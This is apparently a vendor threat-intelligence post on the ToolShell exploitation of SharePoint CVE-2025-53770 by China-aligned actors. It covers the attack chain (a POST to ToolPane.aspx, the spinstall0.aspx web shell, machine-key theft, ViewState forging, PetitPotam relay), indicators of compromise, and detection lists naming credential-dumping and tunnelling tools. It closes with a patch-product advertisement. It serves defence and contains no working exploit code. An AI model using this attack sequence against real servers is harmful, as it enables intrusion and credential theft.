You are currently viewing ToolShell Unlocked: Chinese-Aligned Hackers Weaponize SharePoint Zero-Day for Global Espionage

ToolShell Unlocked: Chinese-Aligned Hackers Weaponize SharePoint Zero-Day for Global Espionage

  • Post author:
  • Reading time:6 mins read

Executive Summary

A critical vulnerability in Microsoft-SharePoint-Server (tracked as CVE-2025-53770 and part of the “ToolShell” chain) has been actively exploited by multiple China-aligned threat actors including Linen-Typhoon, Violet-Typhoon, and Storm-2603. The flaw enables unauthenticated remote code execution and authentication bypass on on-premises SharePoint servers, and has been tied to a wave of espionage and persistent access campaigns targeting governments, telecom companies, universities and finance across Africa, South America, the Middle East and the U.S. The attackers dropped web shells (eg. spinstall0.aspx), then deployed side-loaded backdoors including Zingdoor, ShadowPad and KrustyLoader, and leveraged known techniques such as chain exploitation of CVE-2021-36942 (PetitPotam) for domain compromise. Immediate patching of vulnerable SharePoint servers, rotation of machine-keys, and hunting for web shell indicators is strongly advised.

Background on ToolShell Campaign

The “ToolShell” campaign refers to exploitation of Microsoft SharePoint servers by advanced Chinese-nexus actors, using a chain of vulnerabilities beginning with CVE-2025-49704 and CVE-2025-49706, then bypassed via CVE-2025-53770. These actors gained initial access, harvested cryptographic keys (ValidationKey, DecryptionKey, CompatibilityMode) from spinstall0.aspx web shells, then forged ViewState payloads, escalated privileges with the PetitPotam NTLM relay technique (CVE-2021-36942) and executed backdoors for long-term access. Targets included a Middle Eastern telecom provider, African government departments, a U.S. university, South American agencies and a European financial firm.

Vulnerability Details

CVE-ID: CVE-2025-53770
CVSS Score: 9.8 (Critical)
EPSS Score: 86.41%
Vulnerability Type: Deserialization of untrusted data + authentication bypass (SharePoint Server)
Affected Software: Microsoft SharePoint Server (on-premises) up to patched build July 2025
Patched in: Microsoft July 2025 update; however bypasses were observed soon thereafter, indicating vulnerable variants remained.
Root Cause: SharePoint’s Layouts/15 endpoint (/_layouts/15/ToolPane.aspx) allows authenticated/un-authenticated POST requests to drop spinstall0.aspx, extract cryptographic machine-keys and then query and forge ViewState values for subsequent RCE.

Infection Method

The observed ToolShell campaign follows this sequence:

  1. Initial Access: Attacker sends crafted HTTP POST to / _layouts/15/ToolPane.aspx on flawed SharePoint instance, dropping spinstall0.aspx web shell.
  2. Key Extraction & Persistence: The web shell extracts ValidationKey, DecryptionKey, CompatibilityMode from machine-keys and stores them for forging ViewState payloads.
  3. Exploitation & Side-Loading: After gaining persistence, attacker sides-loads legitimate executables (Trend Micro, Bitdefender) to deploy Zingdoor (Go-based backdoor), ShadowPad, KrustyLoader (Rust-based loader) and launches open-source post-exploitation frameworks such as Sliver.
  4. Privilege Escalation & Movement: Using PetitPotam and other NTLM/LSASS relay techniques to compromise domain controllers and move laterally across the enterprise.
  5. Reconnaissance & Exfiltration: Use of living-off-the-land (LoTL) tools such as Certutil, GoGo Scanner, Revsocks, and power-shell encoded commands to download/upload data and maintain stealth.
  6. Long-term Persistence & Espionage: Maintaining stealthy access, harvesting credentials and central data while disguised within the environment.

Malware Behavior and Capabilities

The campaign uses an advanced tool suite with these capabilities:

  • Web Shell Deployment: spinstall0.aspx which executes commands, uploads files, and extracts machine-keys.
  • Key Extraction & ViewState Forging: Attackers harvested ValidationKey, DecryptionKey, CompatabilityMode and then forged ViewState payloads for persistent RCE.
  • Backdoors & Loaders: Zingdoor (Go), ShadowPad, KrustyLoader (Rust) dropped via side-loading.
  • NTLM Relay / Domain Compromise: Use of CVE-2021-36942 (PetitPotam) to escalate privileges and take over domain infrastructure.
  • LoTL Tools & Obfuscation: Utilities such as Certutil, Revsocks, GoGo Scanner, and ProcDump, Minidump, LsassDumper to dump credentials and maintain stealth.
  • Global Targeting & Multi-Sector Reach: Campaign impacted sectors across telecom, government, education and finance across multiple continents.

Techniques Include (MITRE ATT&CK Mapping)

  • T1190 – Exploit Public-Facing Application: Exploitation of SharePoint endpoint / _layouts/15/ToolPane.aspx.
  • T1210 – Exploitation of Remote Services: Use of sharepoint endpoints and side-loader DLLs.
  • T1078 – Valid Accounts: Side-loaded tools executing as trusted binaries.
  • T1059.001 – PowerShell: Use of Base64 encoded PowerShell commands to drop spinstall0.aspx.
  • T1027 – Obfuscated Files or Information: Tools using side-loading, hidden executables disguised as legitimate AV vendors.
  • T1003 – OS Credential Dumping: Using ProcDump, Minidump, LsassDumper.
  • T1213 – Data from Information Repositories: Extracting ValidationKey, DecryptionKey from machine-keys.
  • T1498 – Network Denial of Service: Not primary but possibility in espionage campaigns to degrade defenses.
  • T1574 – Hijack Execution Flow: DLL side-loading of trusted software to deploy backdoors.

Visual: ToolShell Attack Flow

[Internet-exposed SharePoint Server]
-> [HTTP POST to / _layouts/15/ToolPane.aspx -> drop spinstall0.aspx]
-> [Extract machine-keys (ValidationKey, DecryptionKey, CompatibilityMode)]
-> [Forge ViewState payload + drop Zingdoor/ShadowPad/KrustyLoader via side-load]
-> [Run PetitPotam (CVE-2021-36942) to relay LSASS -> domain compromise]
-> [Deploy LoTL utilities (Certutil, Revsocks, GoGo Scanner)]
-> [Persistence & credential theft across telecom / gov / education networks]

IOCs (Indicators of Compromise)

  • Web shells: spinstall0.aspx in SharePoint TEMPLATE\LAYOUTS\15 directory.
  • Side-loaded executables originally named after AV vendors (Trend Micro, BitDefender) but launching Zingdoor/ShadowPad/KrustyLoader.
  • Use of CVE-2021-36942 (PetitPotam) indicators: unusual NTLM relays, lsass.exe minidumps.
  • Unusual outbound connections to unknown C2 domains following initial access.
  • Abnormal POST requests to SharePoint / _layouts/15/ToolPane.aspx endpoint from unknown IP ranges.

Threat Actor Attribution

While no single group is definitively attributed publicly beyond Microsoft’s initial tri-group disclosure, analysis points to multiple China-nexus actors: Linen Typhoon (aka Budworm), Violet Typhoon (aka Sheathminer), Storm-2603 (ransomware-linked) and Salt Typhoon (aka Glowworm) all exploited ToolShell. The campaign’s global scale, breadth of sectors targeted, use of sophisticated loaders, and credential harvesting suggest a state-aligned espionage objective rather than pure financially-motivated crime.

Mitigation Steps

  1. Rotate Machine-Keys: After patching, rotate the ValidationKey, DecryptionKey, and CompatibilityMode in web.config of SharePoint instances.
  2. Harden Access: Restrict access to SharePoint Admin and Layouts directories; enforce MFA for administrative access; isolate internet-facing instances behind VPN or jump hosts.
  3. Hunt for IOCs: Search for spinstall0.aspx, web shell detections, POST requests to / _layouts/15/ToolPane.aspx, and side-loaded binaries mimicking AV vendors.
  4. Monitor for LoTL Tools: Detect usage of Certutil, GoGo Scanner, Revsocks, ProcDump, Minidump, LsassDumper or signs of PetitPotam relays.
  5. Enhance Threat Detection: Use EDR to flag “unusual child process of AV vendor executables”, “creation of web shell under Layouts folder”, and “machine-key extraction”.
  6. Segment & Micro-Segment: Place SharePoint servers in restricted network zones; apply least-privilege network and firewall policies to limit lateral movement.
  7. Incident Response Playbook: If compromise is suspected, isolate the server, collect memory for machine-key material, perform forensic imaging of TEMPLATE\LAYOUTS\15, and coordinate with national-level incident response entities.

Instantly Fix Risks with Saner Patch Management

Saner patch management is a continuous, automated, and integrated software that instantly fixes risks exploited in the wild. The software supports major operating systems like Windows, Linux, and macOS, as well as 550+ third-party applications.

It also allows you to set up a safe testing area to test patches before deploying them in a primary production environment. Saner patch management additionally supports a patch rollback feature in case of patch failure or a system malfunction.

Experience the fastest and most accurate patching software here.